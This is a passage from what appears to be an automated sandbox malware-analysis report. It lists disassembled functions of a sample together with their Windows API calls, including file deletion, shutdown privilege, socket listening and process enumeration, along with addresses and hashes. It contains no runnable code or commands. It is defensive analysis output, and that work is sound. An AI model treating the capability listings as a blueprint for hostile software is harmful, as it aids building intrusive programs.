                                                                                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 4002782344-1173974218
                                                                                                                            • Opcode ID: 24b65d56edeb6782d54cf1bf196454e9dbdfc8cfb739097a5ebc208db71f5a9e
                                                                                                                            • Instruction ID: bf65a899d5ecade7e9b1833911a7876bdd41af337a6daa7033ae4f9c58d4c6dc
                                                                                                                            • Opcode Fuzzy Hash: 24b65d56edeb6782d54cf1bf196454e9dbdfc8cfb739097a5ebc208db71f5a9e
                                                                                                                            • Instruction Fuzzy Hash: FB518E3180518CEACF05EBA0D9929EDB779AF15300F608169F41AB7191EF316F4AFB61
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C7F440
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C7F470
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7F484
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7F49F
                                                                                                                            • FindNextFileW.KERNEL32(?,?), ref: 00C7F53D
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7F553
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 713712311-438819550
                                                                                                                            • Opcode ID: c226064690212fbf00d7f2815a8cc248dff01788958924b3dd792f5e19a7849f
                                                                                                                            • Instruction ID: 2f45c2fcb38b6252fc2b93efc5e5c8080cf79afa2020127724f4ccb1f59c7966
                                                                                                                            • Opcode Fuzzy Hash: c226064690212fbf00d7f2815a8cc248dff01788958924b3dd792f5e19a7849f
                                                                                                                            • Instruction Fuzzy Hash: F341517190021D9FCF54DF64DC89AEEBBB4FF05314F14856AE829A3191DB309A86EB50
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4104443479-0
                                                                                                                            • Opcode ID: cea86db4f0e40f11499c481075a41ff23ed3b2d7acf0aaf17c93f772a731c0d3
                                                                                                                            • Instruction ID: 53f9bb03c8bff162a031cece1b40f345e199ad600faa7d34cc8a4c6b1882a2af
                                                                                                                            • Opcode Fuzzy Hash: cea86db4f0e40f11499c481075a41ff23ed3b2d7acf0aaf17c93f772a731c0d3
                                                                                                                            • Instruction Fuzzy Hash: 5C129870A00619EFDF14DFA5D981AEEB3F5FF48300F204529E846A7290EB36AE55DB50
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                                                                              • Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C73B89
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C73BD9
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C73BEA
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C73C01
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C73C0A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                                            • Opcode ID: 4bb926701bcee4cd3003a03ee1aec9f829a5c3e5cb7b09b6d6a6d3e20da85136
                                                                                                                            • Instruction ID: 34f6dbe9be4e850be837568582e7a9c1db98ab8d714c405d6086a13fd2f39a49
                                                                                                                            • Opcode Fuzzy Hash: 4bb926701bcee4cd3003a03ee1aec9f829a5c3e5cb7b09b6d6a6d3e20da85136
                                                                                                                            • Instruction Fuzzy Hash: 6C318231008385DBC301EF24C8959EFB7A8BE96314F444E2DF4E992191EB25DA09F793
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
                                                                                                                              • Part of subcall function 00C687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
                                                                                                                              • Part of subcall function 00C687E1: GetLastError.KERNEL32 ref: 00C68865
                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00C751F9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                            • String ID: $@$SeShutdownPrivilege
                                                                                                                            • API String ID: 2234035333-194228
                                                                                                                            • Opcode ID: 8dbe2a99ef90e7060e6d0d6ad31c8b1252a1973fbc486f54a91bf8a70e563409
                                                                                                                            • Instruction ID: 15b9e679ccc3246d7228e74456c2d3aecea06c6c09d7344bd2d24385ad0acbfc
                                                                                                                            • Opcode Fuzzy Hash: 8dbe2a99ef90e7060e6d0d6ad31c8b1252a1973fbc486f54a91bf8a70e563409
                                                                                                                            • Instruction Fuzzy Hash: 140126317916116BF72C6368AC8EFBF725CEB05341F218525F92FE20D3EAD21D0186A0
                                                                                                                            APIs
                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C862DC
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00C862EB
                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00C86307
                                                                                                                            • listen.WSOCK32(00000000,00000005), ref: 00C86316
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00C86330
                                                                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00C86344
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279440585-0
                                                                                                                            • Opcode ID: e47666e7b57296cac90cc98f732bb8b3924bb709d559881eb3ba92cfac4d70b4
                                                                                                                            • Instruction ID: 2f18e5a9fe88123a01412c715452bdac81266a0c4952f14a1049108bd3c64fb0
                                                                                                                            • Opcode Fuzzy Hash: e47666e7b57296cac90cc98f732bb8b3924bb709d559881eb3ba92cfac4d70b4
                                                                                                                            • Instruction Fuzzy Hash: 7D21D2306002049FDB10EF64C849BAEB7A9EF45324F148159E816E73E1C770AD41DB55
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                                                                              • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                                                                            • _memmove.LIBCMT ref: 00C60258
                                                                                                                            • _memmove.LIBCMT ref: 00C6036D
                                                                                                                            • _memmove.LIBCMT ref: 00C60414
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1300846289-0
                                                                                                                            • Opcode ID: 1b87b0e79912398b72777094b2d7f45a408a99ea45473aebc440a69502bd8623
                                                                                                                            • Instruction ID: 038b1928d71962b580a274661fa4c4e42dfc0c23a5ef7cbd0de9df32ac57bd23
                                                                                                                            • Opcode Fuzzy Hash: 1b87b0e79912398b72777094b2d7f45a408a99ea45473aebc440a69502bd8623
                                                                                                                            • Instruction Fuzzy Hash: 8802DF70A00219DBCF14DF64D981AAFBBF5EF44300F2480A9E80AEB355EB31DA54DB91
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C119FA
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00C11A4E
                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00C11A61
                                                                                                                              • Part of subcall function 00C11290: DefDlgProcW.USER32(?,00000020,?), ref: 00C112D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ColorProc$LongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3744519093-0
                                                                                                                            • Opcode ID: 012eeb0cdf2109cc3ff83550ae30c40e932e8930d2d3bfc2cfc5b44fd818aabd
                                                                                                                            • Instruction ID: 0047979ab0831e1bc62fdb4420b3276867fcbcd8df79764b38b8503d0bf9b36a
                                                                                                                            • Opcode Fuzzy Hash: 012eeb0cdf2109cc3ff83550ae30c40e932e8930d2d3bfc2cfc5b44fd818aabd
                                                                                                                            • Instruction Fuzzy Hash: 9DA12971116545BEEA24AA2A5C48EFF296CEF43341F1C011AFF22D51D2CA29DE81B2B5
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C87DB6
                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C8679E
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00C867C7
                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00C86800
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00C8680D
                                                                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00C86821
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 99427753-0
                                                                                                                            • Opcode ID: e77e678e5c431168c6848c83fdcd160622861e3e58b6f011e03c94c594bd059f
                                                                                                                            • Instruction ID: 2b89cce08ccda2a730cebbc1b01f611f1903b4e164b577d9b948587c5ca656be
                                                                                                                            • Opcode Fuzzy Hash: e77e678e5c431168c6848c83fdcd160622861e3e58b6f011e03c94c594bd059f
                                                                                                                            • Instruction Fuzzy Hash: 4941C575A00210AFEB50BF649C96FBE77E8DF06714F04845CF916AB3D2CA709D41A791
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 292994002-0
                                                                                                                            • Opcode ID: 7899c5e53040de2c8f29f76f3021a89cc7352dabb5d27515e0dc7ab43af19801
                                                                                                                            • Instruction ID: 8b203d44bf1f9a473420d631c9255965b50e4f7a2fb5e1e3bc6b69ef8f4ebb65
                                                                                                                            • Opcode Fuzzy Hash: 7899c5e53040de2c8f29f76f3021a89cc7352dabb5d27515e0dc7ab43af19801
                                                                                                                            • Instruction Fuzzy Hash: 2511C4317009116FEF225F269C4CB6EBB98FF457A1B514029F846D3251CBB0DD42DBA0
                                                                                                                            APIs
                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C680C0
                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C680CA
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C680D9
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C680E0
                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C680F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 44706859-0
                                                                                                                            • Opcode ID: 460b8e35d204f4e8c5a9c1c25a9091005a851e77f1d0ac1a57ff2e057eedfb9c
                                                                                                                            • Instruction ID: 0a5a7d7a702a65065b2838e2963de37bd3e059669c05e5b2ac29440ef84eb5a8
                                                                                                                            • Opcode Fuzzy Hash: 460b8e35d204f4e8c5a9c1c25a9091005a851e77f1d0ac1a57ff2e057eedfb9c
                                                                                                                            • Instruction Fuzzy Hash: B8F04F31240204AFEB200FA5ECCDF6F3BACEF4A755B10012AF945C6160CE619D47EA60
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C7C432
                                                                                                                            • CoCreateInstance.OLE32(00CA2D6C,00000000,00000001,00CA2BDC,?), ref: 00C7C44A
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                            • CoUninitialize.OLE32 ref: 00C7C6B7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                            • String ID: .lnk
                                                                                                                            • API String ID: 2683427295-24824748
                                                                                                                            • Opcode ID: cdb5c5f84761c704a59568a207038bbb1f0b297802a92504e17688805b670942
                                                                                                                            • Instruction ID: db55e488c00ea5ce46104be45ec34e7dce1a7f0e438d3c71556770bb11f70a67
                                                                                                                            • Opcode Fuzzy Hash: cdb5c5f84761c704a59568a207038bbb1f0b297802a92504e17688805b670942
                                                                                                                            • Instruction Fuzzy Hash: 4BA13971108205AFD700EF64C891EAFB7ECEF8A354F00492DF155871A2EB71EA49DB62
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C14AD0), ref: 00C14B45
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C14B57
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                            • API String ID: 2574300362-192647395
                                                                                                                            • Opcode ID: 5de7587896e9a3bb1b40bec1e52894a93895a72e1e36ea30f48f3622371460a1
                                                                                                                            • Instruction ID: 467433ddcddb43d5d12a5ab241ff1ea7b92f8faf38bd3e16a0a4d0c4ef51cd1b
                                                                                                                            • Opcode Fuzzy Hash: 5de7587896e9a3bb1b40bec1e52894a93895a72e1e36ea30f48f3622371460a1
                                                                                                                            • Instruction Fuzzy Hash: 90D05B75A10713CFDB209F31EC1CB4A76E4AF06351B15C83ED495D6150D770D4C1C654
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 674341424-0
                                                                                                                            • Opcode ID: 07b6509049ee96ff5aab5f756e05bc7106c557b9d929872c2b66ed4c616f1c41
                                                                                                                            • Instruction ID: 28faf56152c12a6c3a43d4fa97f573096a5d8bcc3fe2d6c3a8ad7f35c6960c31
                                                                                                                            • Opcode Fuzzy Hash: 07b6509049ee96ff5aab5f756e05bc7106c557b9d929872c2b66ed4c616f1c41
                                                                                                                            • Instruction Fuzzy Hash: 9E22DE716083509FC724EF14D891BAFB7E4EF85300F40492DF89A97291DB74EA89DB92
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C8EE3D
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C8EE4B
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C8EF0B
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C8EF1A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                            • String ID:
